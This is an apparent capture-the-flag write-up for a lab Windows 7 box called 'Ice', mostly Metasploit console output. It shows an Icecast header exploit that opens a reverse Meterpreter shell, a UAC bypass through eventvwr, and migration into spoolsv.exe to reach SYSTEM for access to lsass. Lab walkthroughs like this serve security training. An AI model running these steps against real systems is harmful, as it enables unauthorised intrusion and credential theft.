Ice

METASPLOIT

Using: windows/http/icecast_header

[*] Started reverse TCP handler on 10.10.20.30:4444 
[*] Sending stage (175686 bytes) to 10.10.96.65
[*] Meterpreter session 1 opened (10.10.20.30:4444 -> 10.10.96.65:49172) at 2022-10-10 06:45:40 +0200

meterpreter > getuid 
Server username: Dark-PC\Dark
meterpreter > sysinfo 
Computer        : DARK-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

Enumeration

Using: post/multi/recon/local_exploit_suggester

[*] 10.10.96.65 - Collecting local exploits for x86/windows...
[*] 10.10.96.65 - 170 exploit checks are being tried...
[+] 10.10.96.65 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] Post module execution completed

Exploitation

Using: windows/local/bypassuac_eventvwr

[*] Started reverse TCP handler on 10.10.20.30:4445 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175686 bytes) to 10.10.96.65
[*] Meterpreter session 2 opened (10.10.20.30:4445 -> 10.10.96.65:49186) at 2022-10-10 06:50:55 +0200
[*] Cleaning up registry keys ..

meterpreter > getuid 
Server username: Dark-PC\Dark
meterpreter > sysinfo
Computer        : DARK-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

We need to move to a Process that has the Permissions that we need to interact with the lsass Service. The Service responsible for Authentication within Windows.
Migrating to the Printer Spool Service: spoolsv.exe

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 [..]
 1268  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 [..]

meterpreter > migrate -N spoolsv.exe
[*] Migrating from 2532 to 1268...
[*] Migration completed successfully.

We have System Rights: NT AUTHORITY\SYSTEM

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

METASPLOIT​

Enumeration​

Exploitation​

METASPLOIT

Enumeration

Exploitation